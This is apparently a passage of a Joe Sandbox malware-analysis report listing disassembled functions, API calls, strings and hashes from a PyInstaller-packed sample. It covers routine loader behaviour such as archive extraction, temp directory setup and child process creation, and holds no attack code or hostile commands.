                                                                                                                      • Instruction Fuzzy Hash: EDA12CB29043407AD731D6609C82FBB739CAF56312F444A16FE89C6182E735E60DB6A3
                                                                                                                      Strings
                                                                                                                      • Failed to extract %s: failed to open archive file!, xrefs: 00F514A5
                                                                                                                      • Failed to extract %s: failed to open target file!, xrefs: 00F51466
                                                                                                                      • fopen, xrefs: 00F5146B
                                                                                                                      • fseek, xrefs: 00F514DC
                                                                                                                      • fwrite, xrefs: 00F515B3
                                                                                                                      • Failed to extract %s: failed to write data chunk!, xrefs: 00F515AE
                                                                                                                      • fread, xrefs: 00F515C3
                                                                                                                      • Failed to extract %s: failed to read data chunk!, xrefs: 00F515BE
                                                                                                                      • malloc, xrefs: 00F51528
                                                                                                                      • Failed to extract %s: failed to allocate temporary buffer!, xrefs: 00F51523
                                                                                                                      • Failed to extract %s: failed to seek to the entry's data!, xrefs: 00F514D7
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                      • API String ID: 0-666925554
                                                                                                                      • Opcode ID: 84c7c56ec003c0006220f5202060ebf03f1dac103cd222ddd43c5e16c525bf37
                                                                                                                      • Instruction ID: 96207dbf7a00217aa2da507d7a371771fc96c37ba47a9ff36addc99ef167012b
                                                                                                                      • Opcode Fuzzy Hash: 84c7c56ec003c0006220f5202060ebf03f1dac103cd222ddd43c5e16c525bf37
                                                                                                                      • Instruction Fuzzy Hash: AB4149B2E0030177EB20AE646C46B6B3655BBC0766F084625FF19562C2F775EB0CB293
                                                                                                                      APIs
                                                                                                                      • GetCurrentProcess.KERNEL32(00000008,?,00000000,?), ref: 00F5686E
                                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00F56875
                                                                                                                      • GetTokenInformation.ADVAPI32(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?), ref: 00F5688C
                                                                                                                      • GetLastError.KERNEL32 ref: 00F56896
                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,?,?,?,?,?,00F5142E,?,00000000,00F52AFF,?,?,?,?), ref: 00F568C5
                                                                                                                      • ConvertSidToStringSidW.ADVAPI32(00000000,?), ref: 00F568D6
                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,00F5142E,?,00000000,00F52AFF,?,?,?,?,00000000), ref: 00F568EE
                                                                                                                      • LocalFree.KERNEL32(?,?,?,?,?,?,?,00F5142E,?,00000000,00F52AFF,?,?,?,?,00000000), ref: 00F5691B
                                                                                                                      • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,?,?,00000001), ref: 00F5693F
                                                                                                                      • CreateDirectoryW.KERNEL32(?,?,?), ref: 00F5694E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Token$ConvertDescriptorInformationProcessSecurityString$CloseCreateCurrentDirectoryErrorFreeHandleLastLocalOpen
                                                                                                                      • String ID: D:(A;;FA;;;%s)$S-1-3-4
                                                                                                                      • API String ID: 4998090-2855260032
                                                                                                                      • Opcode ID: 3d558238f5bbcad218a05df146b9678661422c7d866df12e05eba4deaa4dbde3
                                                                                                                      • Instruction ID: 366b5da641f052b7a0655d211586edbde62c037c87c26d97b55c3eede81fffbe
                                                                                                                      • Opcode Fuzzy Hash: 3d558238f5bbcad218a05df146b9678661422c7d866df12e05eba4deaa4dbde3
                                                                                                                      • Instruction Fuzzy Hash: AF31A271504315ABE720DF20DC49B9BBBE8EF48361F840919FA68D2191D774DA4CEBA3
                                                                                                                      APIs
                                                                                                                      • ___free_lconv_mon.LIBCMT ref: 00F6A9BD
                                                                                                                        • Part of subcall function 00F6A556: _free.LIBCMT ref: 00F6A573
                                                                                                                        • Part of subcall function 00F6A556: _free.LIBCMT ref: 00F6A585
                                                                                                                        • Part of subcall function 00F6A556: _free.LIBCMT ref: 00F6A597
                                                                                                                        • Part of subcall function 00F6A556: _free.LIBCMT ref: 00F6A5A9
                                                                                                                        • Part of subcall function 00F6A556: _free.LIBCMT ref: 00F6A5BB
                                                                                                                        • Part of subcall function 00F6A556: _free.LIBCMT ref: 00F6A5CD
                                                                                                                        • Part of subcall function 00F6A556: _free.LIBCMT ref: 00F6A5DF
                                                                                                                        • Part of subcall function 00F6A556: _free.LIBCMT ref: 00F6A5F1
                                                                                                                        • Part of subcall function 00F6A556: _free.LIBCMT ref: 00F6A603
                                                                                                                        • Part of subcall function 00F6A556: _free.LIBCMT ref: 00F6A615
                                                                                                                        • Part of subcall function 00F6A556: _free.LIBCMT ref: 00F6A627
                                                                                                                        • Part of subcall function 00F6A556: _free.LIBCMT ref: 00F6A639
                                                                                                                        • Part of subcall function 00F6A556: _free.LIBCMT ref: 00F6A64B
                                                                                                                      • _free.LIBCMT ref: 00F6A9B2
                                                                                                                        • Part of subcall function 00F63B77: RtlFreeHeap.NTDLL(00000000,00000000,?,00F62C8E), ref: 00F63B8D
                                                                                                                        • Part of subcall function 00F63B77: GetLastError.KERNEL32(?,?,00F62C8E), ref: 00F63B9F
                                                                                                                      • _free.LIBCMT ref: 00F6A9D4
                                                                                                                      • _free.LIBCMT ref: 00F6A9E9
                                                                                                                      • _free.LIBCMT ref: 00F6A9F4
                                                                                                                      • _free.LIBCMT ref: 00F6AA16
                                                                                                                      • _free.LIBCMT ref: 00F6AA29
                                                                                                                      • _free.LIBCMT ref: 00F6AA37
                                                                                                                      • _free.LIBCMT ref: 00F6AA42
                                                                                                                      • _free.LIBCMT ref: 00F6AA7A
                                                                                                                      • _free.LIBCMT ref: 00F6AA81
                                                                                                                      • _free.LIBCMT ref: 00F6AA9E
                                                                                                                      • _free.LIBCMT ref: 00F6AAB6
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 161543041-0
                                                                                                                      • Opcode ID: 9e2d21f223b1bf30d39df4c90266986528b70c7ce6b36e366706a4ddff4833e0
                                                                                                                      • Instruction ID: e88cd75c6dfd204880a4730d51d68dcdc0daebf378c8f37d7e13b59bb38a45cb
                                                                                                                      • Opcode Fuzzy Hash: 9e2d21f223b1bf30d39df4c90266986528b70c7ce6b36e366706a4ddff4833e0
                                                                                                                      • Instruction Fuzzy Hash: E6313D31A00701DFEB21AA79DD46B6673F9EF40360F25442AE099E7162DF79BD80EB11
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 776569668-0
                                                                                                                      • Opcode ID: 37834a7e49c7c2683572fd89d82a79cfd57187240c9370364524ab39d5d94135
                                                                                                                      • Instruction ID: 5e8c8626dd12c0caeb55a6d46a736fc720485e1b6ae1456b399be6d4d573e1fb
                                                                                                                      • Opcode Fuzzy Hash: 37834a7e49c7c2683572fd89d82a79cfd57187240c9370364524ab39d5d94135
                                                                                                                      • Instruction Fuzzy Hash: EB219676900108AFCB41EFA4CC82DEE7BB9EF48344F0041A6B6159B572DB75EB44DB80
                                                                                                                      APIs
                                                                                                                      • GetTempPathW.KERNEL32(00001000,?,?,?,?,?,00F55A66,?,00000000,?,pyi-runtime-tmpdir), ref: 00F55B1D
                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 00F55B23
                                                                                                                        • Part of subcall function 00F55C60: GetEnvironmentVariableW.KERNEL32(00000000,?,00002000,?,00F52FD8,_MEIPASS2), ref: 00F55C96
                                                                                                                        • Part of subcall function 00F55C60: ExpandEnvironmentStringsW.KERNEL32(?,?,00002000,?,00002000,?,00F52FD8,_MEIPASS2), ref: 00F55CB2
                                                                                                                        • Part of subcall function 00F5E365: _free.LIBCMT ref: 00F5E378
                                                                                                                      • SetEnvironmentVariableW.KERNEL32(00000000,00000000,00000000,TMP,00000000,?,?,?,?,?,00F5142E,?,00000000,00F52AFF,?,?), ref: 00F55BBC
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Environment$Variable$CurrentExpandPathProcessStringsTemp_free
                                                                                                                      • String ID: LOADER: Failed to set the TMP environment variable.$TMP$TMP$_MEI%d
                                                                                                                      • API String ID: 2771213846-1116378104
                                                                                                                      • Opcode ID: b7bf23547188db4e522a5bf995c5c5adca4588be2d199e066606ee6521600048
                                                                                                                      • Instruction ID: d16658bbfa68dbafc81acae506a429a1a9cdd191604794c0d045671d2a34e217
                                                                                                                      • Opcode Fuzzy Hash: b7bf23547188db4e522a5bf995c5c5adca4588be2d199e066606ee6521600048
                                                                                                                      • Instruction Fuzzy Hash: 1C41D372A00B04B7E16076B05C4BF6F35989F85F53F440835FF45A7182FAA8AA0C72A7
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00F56990: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,00F5246C,?,?,00000400,?,00000000,00000800), ref: 00F569A8
                                                                                                                      • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000,?,00F5142E,?,00000000,00F52AFF,?,?,?,?,00000000), ref: 00F557E4
                                                                                                                      Strings
                                                                                                                      • LOADER: Failed to expand environment variables in the runtime-tmpdir., xrefs: 00F557F9
                                                                                                                      • LOADER: Failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00F55855
                                                                                                                      • LOADER: Failed to convert runtime-tmpdir to a wide string., xrefs: 00F557B3
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharEnvironmentExpandMultiStringsWide
                                                                                                                      • String ID: LOADER: Failed to convert runtime-tmpdir to a wide string.$LOADER: Failed to expand environment variables in the runtime-tmpdir.$LOADER: Failed to obtain the absolute path of the runtime-tmpdir.
                                                                                                                      • API String ID: 2001182103-3498232454
                                                                                                                      • Opcode ID: ab8cc7d22a54aa51b593dd03db8bfd601427cc10b7b3ff904aa7c5bba2a46241
                                                                                                                      • Instruction ID: 0775316f8e7b2361801366cbb119a9c9085e343a939174f261a955557ce3968e
                                                                                                                      • Opcode Fuzzy Hash: ab8cc7d22a54aa51b593dd03db8bfd601427cc10b7b3ff904aa7c5bba2a46241
                                                                                                                      • Instruction Fuzzy Hash: D2311CB2A406006BE6247374AC47FAB72989F84B12F440535FF09D7282F978E50C92D7
                                                                                                                      APIs
                                                                                                                      • GetDC.USER32(?), ref: 00F51E50
                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 00F51EA0
                                                                                                                      • DrawTextW.USER32(00000000,?,000000FF,?,00002550), ref: 00F51EB5
                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00F51EC6
                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00F51ECF
                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?,?,?,?,?,00000032,00000004), ref: 00F51F1C
                                                                                                                      • MoveWindow.USER32(?,?,?,?,00000014,00000001,?,?,?,?,?,?,?,00000032,00000004), ref: 00F51F4B
                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?,00000014,00000001), ref: 00F51F95
                                                                                                                      • MoveWindow.USER32(?,?,00000000,?,?,00000001,?,?,?,00000014,00000001), ref: 00F51FCA
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2147705588-0
                                                                                                                      • Opcode ID: a541af4a0bd3edb6ee3ccae4f94c33fe04acaef8439d3bec591122df70117b51
                                                                                                                      • Instruction ID: e3f4b86dfca041221862fb3933a24816087f14b65d557c3100a17000a34a8018
                                                                                                                      • Opcode Fuzzy Hash: a541af4a0bd3edb6ee3ccae4f94c33fe04acaef8439d3bec591122df70117b51
                                                                                                                      • Instruction Fuzzy Hash: 69418C71604310AFD724DF2DCC889BBB7E9FB88701F41052EF98AC2291E675AD44E761
                                                                                                                      APIs
                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00F56709
                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00F5673E
                                                                                                                      Strings
                                                                                                                      • Out of memory., xrefs: 00F56767
                                                                                                                      • Failed to get UTF-8 buffer size., xrefs: 00F56773
                                                                                                                      • Failed to encode wchar_t as UTF-8., xrefs: 00F56760
                                                                                                                      • WideCharToMultiByte, xrefs: 00F56778
                                                                                                                      • win32_utils_to_utf8, xrefs: 00F5676C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharMultiWide
                                                                                                                      • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                                                                                      • API String ID: 626452242-27947307
                                                                                                                      • Opcode ID: d15ff7dec77ee99a8b1c9b23cea78c0903954ee68d1e6b356f0b7d8cfa2df274
                                                                                                                      • Instruction ID: 3b749cbd0952adfff472b126a4938a46b6872cbf4caadd73a4212a003a757894
                                                                                                                      • Opcode Fuzzy Hash: d15ff7dec77ee99a8b1c9b23cea78c0903954ee68d1e6b356f0b7d8cfa2df274
                                                                                                                      • Instruction Fuzzy Hash: DF313C71644305ABDB106E64BC82F1677D4EB44B26F500536FF54EB2C0EAA5E90CA263
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00F56990: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,00F5246C,?,?,00000400,?,00000000,00000800), ref: 00F569A8
                                                                                                                        • Part of subcall function 00F60F12: SetConsoleCtrlHandler.KERNEL32(00F60B95,00000001,00F7EE98,00000018,00000003,00F7EEB8), ref: 00F6102A
                                                                                                                        • Part of subcall function 00F60F12: GetLastError.KERNEL32 ref: 00F61044
                                                                                                                      • GetStartupInfoW.KERNEL32(?), ref: 00F5616B
                                                                                                                      • GetCommandLineW.KERNEL32(?,00000000,00000001,00000000,00000000,00000000,?,?), ref: 00F561FC
                                                                                                                      • CreateProcessW.KERNEL32(?,00000000), ref: 00F5620B
                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00F5621B
                                                                                                                      • GetExitCodeProcess.KERNEL32(?,00000000), ref: 00F56229
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$ByteCharCodeCommandConsoleCreateCtrlErrorExitHandlerInfoLastLineMultiObjectSingleStartupWaitWide
                                                                                                                      • String ID: CreateProcessW$Error creating child process!
                                                                                                                      • API String ID: 1248179626-3524285272
                                                                                                                      • Opcode ID: 19799a9b8f928aa4837bc36d50b763cdeff8f77d1e4a50297e7cf5be1b7ba8e5
                                                                                                                      • Instruction ID: 07dea62a8891e7f97d8b8b6f8fcdbe468af907573e13a5ce9da34248cc774f38
                                                                                                                      • Opcode Fuzzy Hash: 19799a9b8f928aa4837bc36d50b763cdeff8f77d1e4a50297e7cf5be1b7ba8e5
                                                                                                                      • Instruction Fuzzy Hash: DB319370A08344ABEB10EFA0CC4AB4B77E8AF44705F504919B694961C2DBFDD558EB53
                                                                                                                      APIs
                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000000,00F5663C,00F8DC48,?,00001000,?,?), ref: 00F56A4A
                                                                                                                        • Part of subcall function 00F52290: GetLastError.KERNEL32(?,00000000), ref: 00F522AD
                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,00000000,00F5663C,00F8DC48,?,00001000,?,?), ref: 00F56AAF
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                      • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                                                                                      • API String ID: 1717984340-27947307
                                                                                                                      • Opcode ID: 6f52a251bf29f1bf449b33a4b3293576c740d20072ae93535e9e485171440620
                                                                                                                      • Instruction ID: fe01976edd1574eceb9f11c660a5b0c0080faa7e6646e9a9a67f5b95292af34c
                                                                                                                      • Opcode Fuzzy Hash: 6f52a251bf29f1bf449b33a4b3293576c740d20072ae93535e9e485171440620
                                                                                                                      • Instruction Fuzzy Hash: D401E137B45221B6DA6061697C06F8B3A99CB86F72F154222FF1CE62C0E190E90671A3
                                                                                                                      APIs
                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00F5ADF7
                                                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 00F5ADFF
                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00F5AE88
                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00F5AEB3
                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00F5AF08
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                      • String ID: csm
                                                                                                                      • API String ID: 1170836740-1018135373
                                                                                                                      • Opcode ID: bc6629a90984b088dfea3498b4301f573e68f9f55ff78c0580e79afcbc2f16e7
                                                                                                                      • Instruction ID: 25227c0d234729539fdd7d9042b3328721c1a038aee64d02ba9f913a7ff1b066
                                                                                                                      • Opcode Fuzzy Hash: bc6629a90984b088dfea3498b4301f573e68f9f55ff78c0580e79afcbc2f16e7
                                                                                                                      • Instruction Fuzzy Hash: AC41E330E002089BCF00DF69CC85A9EBBB1AF05325F148255EE185B352D735DA29EB92
                                                                                                                      APIs
                                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,00000000,?,?), ref: 00F56B35
                                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 00F56B66
                                                                                                                      Strings
                                                                                                                      • Failed to get wchar_t buffer size., xrefs: 00F56B9B
                                                                                                                      • Out of memory., xrefs: 00F56B8F
                                                                                                                      • win32_utils_from_utf8, xrefs: 00F56B94
                                                                                                                      • MultiByteToWideChar, xrefs: 00F56BA0
                                                                                                                      • Failed to decode wchar_t from UTF-8, xrefs: 00F56B88
